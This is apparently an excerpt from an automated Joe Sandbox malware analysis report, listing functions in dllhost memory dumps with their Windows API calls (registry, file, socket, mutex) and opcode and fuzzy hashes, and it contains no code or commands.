Instruction Fuzzy Hash: CF21E1B2408344AFE721CB11DC45FA7BBACEF45724F08849AFA858B552D324E909CB71

Uniqueness

Uniqueness Score: 0.01%

Function 005B125E, Relevance: 1.6, APIs: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E38,?,?), ref: 005B130E

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 1d6507de297c91cface1622593df77488b1f6a7e67c9f25687d63de946110e0f
Instruction ID: 3893763029e557c36c7bb3bd461437592f5380977732ea65bb0da733e7983778
Opcode Fuzzy Hash: 1d6507de297c91cface1622593df77488b1f6a7e67c9f25687d63de946110e0f
Instruction Fuzzy Hash: B8318E7250E3C45FD7138B618C65A66BFB4EF87610F1A80CBD884CF6A3D6246919C7A2

Uniqueness

Uniqueness Score: 0.08%

Function 005B19D6, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNEL32(?,00000E38), ref: 005B1A71

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 19567450d46a031b82fa5e5fd89f8f9310ca5c0e9b2130417eb572023cde7414
Instruction ID: 6b6e7d73f2622569fbd7da71280c8b65314aaea9ff7b2e34abec2013f439aff0
Opcode Fuzzy Hash: 19567450d46a031b82fa5e5fd89f8f9310ca5c0e9b2130417eb572023cde7414
Instruction Fuzzy Hash: CD21AD72604704AFEB60DE15CC84FA7BBECEF44710F04891AEA45CAA51E720F905CBB5

Uniqueness

Uniqueness Score: 0.16%

Function 005B0B23, Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 005B0BCA

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 8de2bf82529ad2d37addde82726528b6f0e5b559667667197b57e59501de31f3
Instruction ID: 24899f3487f7cf4dd0dbde9d985ae9ed0a5b73ebeeed91055d981963cdb5f360
Opcode Fuzzy Hash: 8de2bf82529ad2d37addde82726528b6f0e5b559667667197b57e59501de31f3
Instruction Fuzzy Hash: FD31BF72409380AFE722CF65DC45F96FFB8EF06214F08849EE9848B593D335A909CB61

Uniqueness

Uniqueness Score: 0.74%

Function 001BA98D, Relevance: 1.6, APIs: 1, Instructions: 86
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(?,00000E38), ref: 001BAA49

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: 388eed54da0a95674b8b0b0f9c0cdf828e390fddae84a106ebf4ff467b81753a
Instruction ID: 35d0ab7340cd4ce7060de989cedf9b9befcb7d778e4a3c11f3d432940bd3be33
Opcode Fuzzy Hash: 388eed54da0a95674b8b0b0f9c0cdf828e390fddae84a106ebf4ff467b81753a
Instruction Fuzzy Hash: 4831D8714093846FEB22CF60CC45FA2BFB8EF46314F08849AE9854B593D375A509CB61

Uniqueness

Uniqueness Score: 1.01%

Function 001BAEC5, Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 001BAF69

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a95438317d9227fa4bc9341da4052327ebb1263bfea1f314819f249f49e84b12
Instruction ID: 303f1a274a8489d47689c0f55c1e7d3ced5d000e9766ea640a42addb77cec112
Opcode Fuzzy Hash: a95438317d9227fa4bc9341da4052327ebb1263bfea1f314819f249f49e84b12
Instruction Fuzzy Hash: 52318FB5508380AFEB21CF65DC84FA6FBE8EF05310F08849EE9858B652D375E804CB61

Uniqueness

Uniqueness Score: 0.01%

Function 001BA361, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 001BA40C

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f78a46b86e994a8bc91bc3dd41b2fbd72669f3b9d4a509e8b6bfa33f665acbce
Instruction ID: 452378faa5d08008595f85e8e62ec58c8f5b1c55b2481ed0018635b5e455abae
Opcode Fuzzy Hash: f78a46b86e994a8bc91bc3dd41b2fbd72669f3b9d4a509e8b6bfa33f665acbce
Instruction Fuzzy Hash: 62318F75509780AFE721CF11CC84FA2BBF8EF46710F08849AE9858B193D364E949CB72

Uniqueness

Uniqueness Score: 0.03%

Function 005B10AE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E38), ref: 005B1153

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 314b559704a461fa1fd282efb17f3ffc5308efb5cc4cec22c45da26d6a89a507
Instruction ID: f85594d92e1e218aabf6325d8e7e942a478c62bcedd4ab12acc73b4f5ce1c05d
Opcode Fuzzy Hash: 314b559704a461fa1fd282efb17f3ffc5308efb5cc4cec22c45da26d6a89a507
Instruction Fuzzy Hash: 3A21ECB2504304AEFB20DF10CC85FAAFBACEB44714F04885AFA489A581D7B5A909CB71

Uniqueness

Uniqueness Score: 0.83%

Function 001BAD2A, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E38,?,?), ref: 001BADD6

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: f2ea386901b57f4dd08d869b27a9c5bca7b677cd0e8ed160752f314b6a8bcb4a
Instruction ID: 086051e9c596ae0f5a40051f32687975824bcf9acad1d073723badfd93d31ee1
Opcode Fuzzy Hash: f2ea386901b57f4dd08d869b27a9c5bca7b677cd0e8ed160752f314b6a8bcb4a
Instruction Fuzzy Hash: DE317C7540E3C05FD3138B758C65A62BFB4AF87610F1A81CBD8848F6A3D2246919D7B2

Uniqueness

Uniqueness Score: 0.01%

Function 005B1631, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B16B8

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 5a67b0067539aec87a082d519ad19b0309cc0059246c4236ea25e6bb4c52039a
Instruction ID: 9313db9bdb895502f92f725a828990cd0464aeb5572667d94e742e54c62ef061
Opcode Fuzzy Hash: 5a67b0067539aec87a082d519ad19b0309cc0059246c4236ea25e6bb4c52039a
Instruction Fuzzy Hash: 7721D3725093806FEB12CB24DC45F96BFB8EF42324F0880DBE944CB193D264A908C771

Uniqueness

Uniqueness Score: 0.45%

Function 005B0A36, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 005B0AC1

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 31ec299623b833388e07012e9007c5106c47e4c30c513467bf05ad283a0aa3d2
Instruction ID: 2b3ae47b15a477690128e9976a2760dd7edeaf1f27f7200a5801dbf135145f8a
Opcode Fuzzy Hash: 31ec299623b833388e07012e9007c5106c47e4c30c513467bf05ad283a0aa3d2
Instruction Fuzzy Hash: 162181B1509380AFE721CB65DC45FA6FFE8EF45324F08849EE9448B692D375A904CB71

Uniqueness

Uniqueness Score: 1.09%

Function 005B034A, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 005B03D6

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 203a26893c5e7c2e76f4d0aa1e9da6c1525675412262ed039c8ee6da1e479654
Instruction ID: 498e8b34d39ad5c469a9922a90ac72a1a6526ef29a1aa979eabf5212a2d24cca
Opcode Fuzzy Hash: 203a26893c5e7c2e76f4d0aa1e9da6c1525675412262ed039c8ee6da1e479654
Instruction Fuzzy Hash: 8C218271409380AFEB21CF51DC45F96FFB8EF45214F08849EEA858B692D375A808CB61

Uniqueness

Uniqueness Score: 1.03%

Function 001BA462, Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 001BA4F8

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 9a61bc0542c7836dc161e92a67c889a5e5977940ec40a679a0709f1f5e43b38d
Instruction ID: 87fa05aa74c0a3f2afd3949f73b8032fc5b0dbaf437c1ee45ff7b3c1f5f41620
Opcode Fuzzy Hash: 9a61bc0542c7836dc161e92a67c889a5e5977940ec40a679a0709f1f5e43b38d
Instruction Fuzzy Hash: A021A1725083806FD7228F11DC44FA7BFBCEF46320F08849AE9858B592D364E948C771

Uniqueness

Uniqueness Score: 0.21%

Function 005B08A6, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E38), ref: 005B0917

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 1b6b55c5d198b79dec2a1bbd854c8a0acd71b0c668d7fef31ce0c930be9389a9
Instruction ID: fdee1ad2079e952852e9e0d04344df330dd539e26149ba035e7356abc7a3d66c
Opcode Fuzzy Hash: 1b6b55c5d198b79dec2a1bbd854c8a0acd71b0c668d7fef31ce0c930be9389a9
Instruction Fuzzy Hash: 8821C272504204AFFB20DF24DC45F6BBBACEB44714F04846AF904DB682D774E905CA71

Uniqueness

Uniqueness Score: 0.70%

Function 001BAEEA, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 001BAF69

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 566131a3128a30d176a4b86e4102841e3751c77082d2e8e330f629ed9c48bfff
Instruction ID: 8c31041cbc8a886a37afa90fdde170e4462ca2852e94137eb6a6c7578f5e491e
Opcode Fuzzy Hash: 566131a3128a30d176a4b86e4102841e3751c77082d2e8e330f629ed9c48bfff
Instruction Fuzzy Hash: B6219CB1504340AFEB20CF65CC84BAAFBE8EF08324F04846EEA458B651D771E804CB72

Uniqueness

Uniqueness Score: 0.01%

Function 005B079A, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B082C

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7f55e751ebb302f12ac1260e2d21db30a20c4baff96659264d9d8dd9d7d830a9
Instruction ID: 3b8c7c85fb192db382b56b9126070d911ef793020f78011c412f688046ebee9d
Opcode Fuzzy Hash: 7f55e751ebb302f12ac1260e2d21db30a20c4baff96659264d9d8dd9d7d830a9
Instruction Fuzzy Hash: 4D218C72509780AFE721CB11CC44FA3BFE8EB45720F08849AE9459B292D364E948CBA1

Uniqueness

Uniqueness Score: 0.03%

Function 001BA8C6, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E38), ref: 001BA945

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 1eafa7dd606d52a56eafe0a29374d9866ba93e98f31796a37c2ef208d34aae8b
Instruction ID: 0d542f2d948915c19eb99823d8120586ec422b2532c09c038ae62b9fdad17e04
Opcode Fuzzy Hash: 1eafa7dd606d52a56eafe0a29374d9866ba93e98f31796a37c2ef208d34aae8b
Instruction Fuzzy Hash: B921D172504304AFEB20DF11DC85FAAFBACEF44724F05855AFA458A652D734E908CAB2

Uniqueness

Uniqueness Score: 0.01%

Function 005B17FF, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetProcessWorkingSetSize.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B187B

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: b930fe1c055962ffdf6c272e0c0d888cad12c8f04ff377341fdc60bbfb219f88
Instruction ID: d594ea06239e4ae2866b67bca03521b3115606b06d65b98288a6852aa03e179f
Opcode Fuzzy Hash: b930fe1c055962ffdf6c272e0c0d888cad12c8f04ff377341fdc60bbfb219f88
Instruction Fuzzy Hash: 5F21C2725093806FEB21CB11DC45FA6BFA8EF46220F0884AAF9448B192D364A908CB65

Uniqueness

Uniqueness Score: 6.84%

Function 005B171B, Relevance: 1.6, APIs: 1, Instructions: 73UNIQUE

Download Yara Rule

APIs

GetProcessWorkingSetSize.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B1797

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: b930fe1c055962ffdf6c272e0c0d888cad12c8f04ff377341fdc60bbfb219f88
Instruction ID: dec3d70ac0be6a8b9fe07e263e4d792e326749153ee92ef0cd3131d06c14a462
Opcode Fuzzy Hash: b930fe1c055962ffdf6c272e0c0d888cad12c8f04ff377341fdc60bbfb219f88
Instruction Fuzzy Hash: 7921D4725093846FEB21CF51DC45FA6BFACEF45320F08C4AAE944CB192D364A904CB75

Uniqueness

Uniqueness Score: 37.75%

Function 001BA646, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 001BA6B9

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 241395f5fd81f0adf15fc10f70a1b6da1dd8f3d4294274f05085243fc671fd9b
Instruction ID: ae51a92d30380ab058087c0cac4eff98d9125312b84d205c1b172aa58bc540db
Opcode Fuzzy Hash: 241395f5fd81f0adf15fc10f70a1b6da1dd8f3d4294274f05085243fc671fd9b
Instruction Fuzzy Hash: E421CFB5504340AFE720DF25CD85BA6FBE8EF48324F0884AAE944CB641E771E805CB72

Uniqueness

Uniqueness Score: 0.03%

Function 005B00E2, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B0161

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 679625d602ed79dbbb1bb4c07ebcf4a985cbb9f0d08e0031213ba8680ace1936
Instruction ID: c5d75b95af09f4cbe9fc0fb3e36c2ef4c5c875aedacdfcdc7fc10d8300f5c90f
Opcode Fuzzy Hash: 679625d602ed79dbbb1bb4c07ebcf4a985cbb9f0d08e0031213ba8680ace1936
Instruction Fuzzy Hash: 9021A472409380AFDB21CF55DC44F97BFB8EF45324F08849AE9459B192D374A908CB71

Uniqueness

Uniqueness Score: 0.52%

Function 001BAFD0, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 001BB055

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: ab4259dfffb69d9c371ef0f73ab708f4141aca340189a56d186696863e2f2e65
Instruction ID: a928adc4c537d019235f0b69c348e79fe2ea9476607c02554ef6f39b1e053332
Opcode Fuzzy Hash: ab4259dfffb69d9c371ef0f73ab708f4141aca340189a56d186696863e2f2e65
Instruction Fuzzy Hash: D721D5754093846FE7228B159C44BB3BFBCDF46720F0880DAF9858B593D364A908C771

Uniqueness

Uniqueness Score: 0.14%

Function 001BA392, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 001BA40C

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ea857ed73a5c77eab656a26866c2999370cc86f477a3aeae7a9fdbd1c45e7fdf
Instruction ID: 548a2b32a760325b90bea8663090301e4b92f7bc8d1b4f51a6ddf4535ea7b7ea
Opcode Fuzzy Hash: ea857ed73a5c77eab656a26866c2999370cc86f477a3aeae7a9fdbd1c45e7fdf
Instruction Fuzzy Hash: F5219075604304AFEB20CF15CC84FA6F7ECEF44720F48856AEA458B652D7A0E945CAB2

Uniqueness

Uniqueness Score: 0.03%

Function 005B0A56, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 005B0AC1

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: c260ad1029926b1a23d8f644d76479bef458dceb91a7a6153332d1ab2374d43c
Instruction ID: 5940ecb775f6a115b0246ef526b9f5f8d934e3965635ed73bd2888a3c4373920
Opcode Fuzzy Hash: c260ad1029926b1a23d8f644d76479bef458dceb91a7a6153332d1ab2374d43c
Instruction Fuzzy Hash: 8021AE71504340AFEB20DF65DD85FA6FBE8EB44324F1488AAE9448B692D775B804CA71

Uniqueness

Uniqueness Score: 1.09%

Function 005B0B56, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 005B0BCA

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: cdbca648c294bbef85e25e8cb458ce0016f27cbe515ba57bebec7b9638be425e
Instruction ID: 5f5a2cfb6940813da6c08fd68edec040daa1f4b3263f5abb7a0ee81f8bfa1419
Opcode Fuzzy Hash: cdbca648c294bbef85e25e8cb458ce0016f27cbe515ba57bebec7b9638be425e
Instruction Fuzzy Hash: 6C212071404200AFEB21CF11DC85FA6FBE8EF08324F04845EEA448B681D331B904CBB1

Uniqueness

Uniqueness Score: 0.74%

Function 005B036A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 005B03D6

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: c30c657d7483c5c7f4d23417128db30101f808045047058461fc8f5e62b53e63
Instruction ID: dee6e3eab3243f91d2f4573314a7ba6e246812e262fa8c7febeb014960e73ef1
Opcode Fuzzy Hash: c30c657d7483c5c7f4d23417128db30101f808045047058461fc8f5e62b53e63
Instruction Fuzzy Hash: 6A21CD71504340AFEB21CF50DD49BA6FBE8EF48324F04886AEA458BA92D375B804CB61

Uniqueness

Uniqueness Score: 1.03%

Function 001BA9CE, Relevance: 1.6, APIs: 1, Instructions: 66windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(?,00000E38), ref: 001BAA49

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: 145dc5ea3326c5f62f39e91ecaa0dadbbf9df862b10d4fc5f8722c21ebcfde1b
Instruction ID: e52ddfac63f416c409227975f88a404767f5c91f85dc41f2284e83c5feb240ae
Opcode Fuzzy Hash: 145dc5ea3326c5f62f39e91ecaa0dadbbf9df862b10d4fc5f8722c21ebcfde1b
Instruction Fuzzy Hash: C4210F72000300AFEB309F20CD41FA6FBA8EF44320F14845AFE454A691D775A908CBB2

Uniqueness

Uniqueness Score: 1.01%

Function 005B07BA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B082C

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6dc5764cff743d68aa597406168232e6f559a994dd9c3138a60a0d295ad06d27
Instruction ID: c642c9148a60ae7094eb8b8d36bfe4e70cd3c094cc9082bbf67734faef8e2159
Opcode Fuzzy Hash: 6dc5764cff743d68aa597406168232e6f559a994dd9c3138a60a0d295ad06d27
Instruction Fuzzy Hash: 1F11AC72504700AFEB20CF11CC81FA7BBE8EB44720F08855AFA459A692D760FA44CAB1

Uniqueness

Uniqueness Score: 0.03%

Function 001BA486, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 001BA4F8

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 95b114d84cf7eda41443f3364801be33b7dba1b1ea2113b25765f4659e8ebe11
Instruction ID: c481cd9f9ab20870dc65ee02766d5bf20fbc0d477e6301a4c35384d7c0db6cb1
Opcode Fuzzy Hash: 95b114d84cf7eda41443f3364801be33b7dba1b1ea2113b25765f4659e8ebe11
Instruction Fuzzy Hash: F911D376504300AFEB309E11DC45FA7FBECEF44720F08855AED458A642D760E944CAB2

Uniqueness

Uniqueness Score: 0.21%

Function 005B0FC2, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B1021

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 02657e698e5d40bf52ac9751cead877b074d09b5f441ba7d3cd6a198414316c6
Instruction ID: cf313a4b1ef3fcceac32022b45ab2b7b385e7a7d9981b625836f2fec545bdb94
Opcode Fuzzy Hash: 02657e698e5d40bf52ac9751cead877b074d09b5f441ba7d3cd6a198414316c6
Instruction Fuzzy Hash: 23110072504744AFEB209F51DC84FA6BBA8EF44720F04846AEA058B652D774A944CBB1

Uniqueness

Uniqueness Score: 1.05%

Function 005B1344, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 005B13AE

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2ef334710f58cd7022fdba7b9cb2babdc77d1c71a265eb5b259f21da3e1cff0a
Instruction ID: a74492f17d5876430abf4f6f2e43573f8bb43a625dd8be5e0fe5919683c7ac1c
Opcode Fuzzy Hash: 2ef334710f58cd7022fdba7b9cb2babdc77d1c71a265eb5b259f21da3e1cff0a
Instruction Fuzzy Hash: 7E11B4725047809FDB61CF65DC95BA2BFE8EF05220F0884AAE845CB652E234E804CB61

Uniqueness

Uniqueness Score: 0.02%

Function 001BAE00, Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 001BAE6A

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 795723b47e686baf1c19f2e2358111be3678528275c4d440206081b7b0123ffd
Instruction ID: 7f199696fdd8d55ae1370cb6cce5beea7dec6e98adc13094677e52b80061867d
Opcode Fuzzy Hash: 795723b47e686baf1c19f2e2358111be3678528275c4d440206081b7b0123ffd
Instruction Fuzzy Hash: A31184725053805FDB21CF65DC85B96BFE8EF45220F0884AAE945CB252D374E804CB62

Uniqueness

